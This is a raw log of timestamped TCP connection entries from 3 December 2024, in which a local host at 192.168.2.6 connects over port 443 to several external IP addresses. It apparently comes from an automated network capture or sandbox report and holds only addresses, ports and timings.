                      Dec 3, 2024 17:51:29.267484903 CET49724443192.168.2.623.218.208.109
                      Dec 3, 2024 17:51:29.311341047 CET4434972423.218.208.109192.168.2.6
                      Dec 3, 2024 17:51:29.962497950 CET4434972423.218.208.109192.168.2.6
                      Dec 3, 2024 17:51:29.962568045 CET4434972423.218.208.109192.168.2.6
                      Dec 3, 2024 17:51:29.962635994 CET49724443192.168.2.623.218.208.109
                      Dec 3, 2024 17:51:29.963349104 CET49724443192.168.2.623.218.208.109
                      Dec 3, 2024 17:51:29.963366032 CET4434972423.218.208.109192.168.2.6
                      Dec 3, 2024 17:51:29.963375092 CET49724443192.168.2.623.218.208.109
                      Dec 3, 2024 17:51:29.963380098 CET4434972423.218.208.109192.168.2.6
                      Dec 3, 2024 17:51:30.648370028 CET4434972513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:30.649312019 CET49725443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:30.649338007 CET4434972513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:30.649843931 CET49725443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:30.649848938 CET4434972513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:30.653312922 CET4434972613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:30.653378963 CET4434972713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:30.653446913 CET4434972813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:30.653603077 CET49726443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:30.653625011 CET4434972613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:30.653820038 CET49728443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:30.653835058 CET4434972813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:30.654011965 CET49726443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:30.654019117 CET4434972613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:30.654269934 CET49728443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:30.654274940 CET4434972813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:30.654292107 CET49727443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:30.654306889 CET4434972713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:30.654694080 CET49727443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:30.654697895 CET4434972713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:30.655651093 CET4434972913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:30.655944109 CET49729443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:30.655960083 CET4434972913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:30.656305075 CET49729443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:30.656308889 CET4434972913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:30.747251987 CET44349730172.217.171.195192.168.2.6
                      Dec 3, 2024 17:51:30.748903036 CET49730443192.168.2.6172.217.171.195
                      Dec 3, 2024 17:51:30.748917103 CET44349730172.217.171.195192.168.2.6
                      Dec 3, 2024 17:51:30.749823093 CET44349730172.217.171.195192.168.2.6
                      Dec 3, 2024 17:51:30.749902010 CET49730443192.168.2.6172.217.171.195
                      Dec 3, 2024 17:51:30.750945091 CET49730443192.168.2.6172.217.171.195
                      Dec 3, 2024 17:51:30.751003027 CET44349730172.217.171.195192.168.2.6
                      Dec 3, 2024 17:51:30.751262903 CET49730443192.168.2.6172.217.171.195
                      Dec 3, 2024 17:51:30.795340061 CET44349730172.217.171.195192.168.2.6
                      Dec 3, 2024 17:51:30.804265022 CET49730443192.168.2.6172.217.171.195
                      Dec 3, 2024 17:51:30.804277897 CET44349730172.217.171.195192.168.2.6
                      Dec 3, 2024 17:51:30.854513884 CET49730443192.168.2.6172.217.171.195
                      Dec 3, 2024 17:51:31.097695112 CET4434972513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.097718954 CET4434972513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.097831964 CET49725443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.097841978 CET4434972513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.097888947 CET49725443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.098139048 CET49725443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.098143101 CET4434972513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.098155975 CET49725443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.098279953 CET4434972513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.098305941 CET4434972513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.098376036 CET49725443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.101351976 CET49731443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.101382971 CET4434973113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.101453066 CET49731443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.101654053 CET49731443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.101666927 CET4434973113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.107153893 CET4434972613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.107225895 CET4434972613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.107273102 CET49726443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.107389927 CET49726443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.107404947 CET4434972613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.107418060 CET49726443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.107424021 CET4434972613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.109416008 CET4434972913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.109489918 CET4434972913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.109558105 CET49729443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.109654903 CET49729443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.109663963 CET4434972913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.109677076 CET49729443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.109682083 CET4434972913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.109747887 CET49732443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.109765053 CET4434973213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.109818935 CET49732443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.109970093 CET49732443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.109980106 CET4434973213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.111854076 CET49733443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.111891031 CET4434973313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.111955881 CET49733443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.112075090 CET49733443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.112095118 CET4434973313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.112384081 CET4434972813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.112401962 CET4434972813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.112454891 CET4434972813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.112457991 CET49728443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.112499952 CET49728443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.112687111 CET49728443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.112687111 CET49728443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.112694979 CET4434972813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.112703085 CET4434972813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.113042116 CET4434972713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.113065004 CET4434972713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.113133907 CET49727443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.113142967 CET4434972713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.113184929 CET49727443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.113235950 CET49727443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.113240004 CET4434972713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.113255978 CET49727443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.113392115 CET4434972713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.113419056 CET4434972713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.113461971 CET49727443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.115148067 CET49734443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.115159988 CET4434973413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.115253925 CET49734443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.115277052 CET49735443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.115297079 CET4434973513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.115353107 CET49735443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.115381002 CET49734443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.115386963 CET4434973413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.115509987 CET49735443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:31.115525007 CET4434973513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:31.363279104 CET44349730172.217.171.195192.168.2.6
                      Dec 3, 2024 17:51:31.363465071 CET44349730172.217.171.195192.168.2.6
                      Dec 3, 2024 17:51:31.363539934 CET49730443192.168.2.6172.217.171.195
                      Dec 3, 2024 17:51:31.364056110 CET49730443192.168.2.6172.217.171.195
                      Dec 3, 2024 17:51:31.364069939 CET44349730172.217.171.195192.168.2.6
                      Dec 3, 2024 17:51:31.366753101 CET49736443192.168.2.6172.217.171.195
                      Dec 3, 2024 17:51:31.366796970 CET44349736172.217.171.195192.168.2.6
                      Dec 3, 2024 17:51:31.366888046 CET49736443192.168.2.6172.217.171.195
                      Dec 3, 2024 17:51:31.367100954 CET49736443192.168.2.6172.217.171.195
                      Dec 3, 2024 17:51:31.367110014 CET44349736172.217.171.195192.168.2.6
                      Dec 3, 2024 17:51:32.984661102 CET4434973113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:32.985240936 CET49731443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:32.985259056 CET4434973113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:32.985698938 CET49731443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:32.985703945 CET4434973113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:32.986268044 CET4434973313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:32.986520052 CET49733443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:32.986543894 CET4434973313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:32.986891031 CET49733443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:32.986896038 CET4434973313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:32.990293026 CET4434973513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:32.990534067 CET49735443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:32.990549088 CET4434973513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:32.990864992 CET44349736172.217.171.195192.168.2.6
                      Dec 3, 2024 17:51:32.990984917 CET49735443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:32.990989923 CET4434973513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:32.991153002 CET49736443192.168.2.6172.217.171.195
                      Dec 3, 2024 17:51:32.991178989 CET44349736172.217.171.195192.168.2.6
                      Dec 3, 2024 17:51:32.991496086 CET44349736172.217.171.195192.168.2.6
                      Dec 3, 2024 17:51:32.992135048 CET49736443192.168.2.6172.217.171.195
                      Dec 3, 2024 17:51:32.992202997 CET44349736172.217.171.195192.168.2.6
                      Dec 3, 2024 17:51:32.992291927 CET49736443192.168.2.6172.217.171.195
                      Dec 3, 2024 17:51:32.993212938 CET4434973213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:32.993531942 CET49732443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:32.993544102 CET4434973213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:32.993978977 CET49732443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:32.993983030 CET4434973213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.035336971 CET44349736172.217.171.195192.168.2.6
                      Dec 3, 2024 17:51:33.231801987 CET4434973413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.232676029 CET49734443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.232700109 CET4434973413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.233119011 CET49734443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.233124018 CET4434973413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.601519108 CET4434973313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.601587057 CET4434973313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.601667881 CET49733443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.601783991 CET4434973513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.601855993 CET4434973513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.601887941 CET49733443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.601906061 CET4434973313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.601917028 CET49735443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.601917028 CET49733443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.601931095 CET4434973313.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.602020025 CET4434973113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.602078915 CET4434973113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.602123022 CET49731443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.603454113 CET49731443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.603462934 CET4434973113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.604451895 CET49735443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.604459047 CET4434973513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.604469061 CET49735443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.604473114 CET4434973513.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.607768059 CET49737443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.607785940 CET4434973713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.607880116 CET49737443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.607968092 CET49738443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.607980967 CET4434973813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.608038902 CET49738443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.608117104 CET49737443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.608133078 CET4434973713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.608614922 CET49739443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.608623981 CET4434973913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.608668089 CET49739443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.608705997 CET49738443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.608716965 CET4434973813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.608880043 CET49739443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.608895063 CET4434973913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.610356092 CET4434973213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.610421896 CET4434973213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.610487938 CET49732443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.610526085 CET49732443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.610533953 CET4434973213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.610546112 CET49732443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.610551119 CET4434973213.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.612243891 CET49740443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.612257004 CET4434974013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.612323999 CET49740443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.612432957 CET49740443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.612440109 CET4434974013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.705883026 CET4434973413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.705954075 CET4434973413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.706010103 CET49734443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.706177950 CET49734443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.706195116 CET4434973413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.706207991 CET49734443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.706212997 CET4434973413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.708575964 CET49741443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.708611965 CET4434974113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.708681107 CET49741443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.708818913 CET49741443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:33.708833933 CET4434974113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:33.750436068 CET49742443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:33.750473976 CET4434974220.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:33.750550032 CET49742443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:33.751142025 CET49742443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:33.751154900 CET4434974220.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:33.865847111 CET49743443192.168.2.620.109.210.53
                      Dec 3, 2024 17:51:33.865890026 CET4434974320.109.210.53192.168.2.6
                      Dec 3, 2024 17:51:33.865983963 CET49743443192.168.2.620.109.210.53
                      Dec 3, 2024 17:51:33.867052078 CET49743443192.168.2.620.109.210.53
                      Dec 3, 2024 17:51:33.867063999 CET4434974320.109.210.53192.168.2.6
                      Dec 3, 2024 17:51:34.087553024 CET44349736172.217.171.195192.168.2.6
                      Dec 3, 2024 17:51:34.087694883 CET44349736172.217.171.195192.168.2.6
                      Dec 3, 2024 17:51:34.087748051 CET49736443192.168.2.6172.217.171.195
                      Dec 3, 2024 17:51:34.088324070 CET49736443192.168.2.6172.217.171.195
                      Dec 3, 2024 17:51:34.088345051 CET44349736172.217.171.195192.168.2.6
                      Dec 3, 2024 17:51:34.088356018 CET49736443192.168.2.6172.217.171.195
                      Dec 3, 2024 17:51:34.088398933 CET49736443192.168.2.6172.217.171.195
                      Dec 3, 2024 17:51:35.420655012 CET4434974013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.421212912 CET49740443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.421243906 CET4434974013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.421844959 CET49740443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.421849966 CET4434974013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.433228970 CET4434973913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.433243990 CET4434973713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.433665037 CET49739443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.433682919 CET4434973913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.433942080 CET49737443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.433988094 CET4434973713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.434096098 CET49739443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.434099913 CET4434973913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.434431076 CET49737443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.434436083 CET4434973713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.485145092 CET4434973813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.486038923 CET49738443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.486053944 CET4434973813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.486468077 CET49738443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.486471891 CET4434973813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.506608009 CET4434974220.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:35.506692886 CET49742443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:35.509489059 CET49742443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:35.509499073 CET4434974220.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:35.509762049 CET4434974220.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:35.512181044 CET49742443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:35.512248993 CET49742443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:35.512259007 CET4434974220.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:35.512424946 CET49742443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:35.559330940 CET4434974220.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:35.652757883 CET4434974113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.658509970 CET49741443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.658538103 CET4434974113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.658998966 CET49741443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.659010887 CET4434974113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.661518097 CET4434974320.109.210.53192.168.2.6
                      Dec 3, 2024 17:51:35.661619902 CET49743443192.168.2.620.109.210.53
                      Dec 3, 2024 17:51:35.663294077 CET49743443192.168.2.620.109.210.53
                      Dec 3, 2024 17:51:35.663304090 CET4434974320.109.210.53192.168.2.6
                      Dec 3, 2024 17:51:35.663539886 CET4434974320.109.210.53192.168.2.6
                      Dec 3, 2024 17:51:35.711967945 CET49743443192.168.2.620.109.210.53
                      Dec 3, 2024 17:51:35.731065989 CET49743443192.168.2.620.109.210.53
                      Dec 3, 2024 17:51:35.775336981 CET4434974320.109.210.53192.168.2.6
                      Dec 3, 2024 17:51:35.862802029 CET4434974013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.862863064 CET4434974013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.862946033 CET49740443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.863229036 CET49740443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.863243103 CET4434974013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.863253117 CET49740443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.863256931 CET4434974013.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.867813110 CET49744443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.867846012 CET4434974413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.867985010 CET49744443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.868508101 CET49744443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.868525982 CET4434974413.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.888493061 CET49745443192.168.2.6191.252.162.52
                      Dec 3, 2024 17:51:35.888514996 CET44349745191.252.162.52192.168.2.6
                      Dec 3, 2024 17:51:35.888614893 CET49745443192.168.2.6191.252.162.52
                      Dec 3, 2024 17:51:35.888860941 CET49745443192.168.2.6191.252.162.52
                      Dec 3, 2024 17:51:35.888871908 CET44349745191.252.162.52192.168.2.6
                      Dec 3, 2024 17:51:35.921547890 CET4434973913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.921614885 CET4434973913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.921740055 CET49739443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.921885014 CET4434973713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.921911955 CET49739443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.921930075 CET4434973913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.921940088 CET49739443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.921946049 CET4434973713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.921952963 CET4434973913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.922030926 CET49737443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.922135115 CET49737443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.922154903 CET4434973713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.922173977 CET49737443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.922178984 CET4434973713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.925071001 CET49746443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.925091028 CET4434974613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.925092936 CET49747443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.925111055 CET4434974713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.925154924 CET49746443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.925187111 CET49747443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.925333977 CET49747443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.925345898 CET4434974713.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:35.925359964 CET49746443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:35.925374031 CET4434974613.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:36.048732042 CET4434973813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:36.048788071 CET4434973813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:36.048876047 CET49738443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:36.049113035 CET49738443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:36.049124002 CET4434973813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:36.049135923 CET49738443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:36.049140930 CET4434973813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:36.052203894 CET49748443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:36.052242041 CET4434974813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:36.052334070 CET49748443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:36.052501917 CET49748443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:36.052517891 CET4434974813.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:36.106877089 CET4434974113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:36.106964111 CET4434974113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:36.107011080 CET49741443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:36.107235909 CET49741443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:36.107255936 CET4434974113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:36.107265949 CET49741443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:36.107270956 CET4434974113.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:36.110006094 CET49749443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:36.110054970 CET4434974913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:36.110126019 CET49749443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:36.110311031 CET49749443192.168.2.613.107.246.63
                      Dec 3, 2024 17:51:36.110321999 CET4434974913.107.246.63192.168.2.6
                      Dec 3, 2024 17:51:36.167738914 CET44349719142.250.181.100192.168.2.6
                      Dec 3, 2024 17:51:36.167803049 CET44349719142.250.181.100192.168.2.6
                      Dec 3, 2024 17:51:36.167857885 CET49719443192.168.2.6142.250.181.100
                      Dec 3, 2024 17:51:36.224083900 CET4434974220.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:36.224617958 CET4434974220.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:36.224689007 CET49742443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:36.225502014 CET49742443192.168.2.620.198.119.143
                      Dec 3, 2024 17:51:36.225519896 CET4434974220.198.119.143192.168.2.6
                      Dec 3, 2024 17:51:36.363399029 CET4434974320.109.210.53192.168.2.6
                      Dec 3, 2024 17:51:36.363423109 CET4434974320.109.210.53192.168.2.6
                      Dec 3, 2024 17:51:36.363430023 CET4434974320.109.210.53192.168.2.6
                      Dec 3, 2024 17:51:36.363439083 CET4434974320.109.210.53192.168.2.6
                      Dec 3, 2024 17:51:36.363455057 CET4434974320.109.210.53192.168.2.6
                      Dec 3, 2024 17:51:36.363497019 CET49743443192.168.2.620.109.210.53
                      Dec 3, 2024 17:51:36.363518000 CET4434974320.109.210.53192.168.2.6
                      Dec 3, 2024 17:51:36.363533974 CET49743443192.168.2.620.109.210.53
                      Dec 3, 2024 17:51:36.363564968 CET49743443192.168.2.620.109.210.53
                      Dec 3, 2024 17:51:36.388871908 CET4434974320.109.210.53192.168.2.6
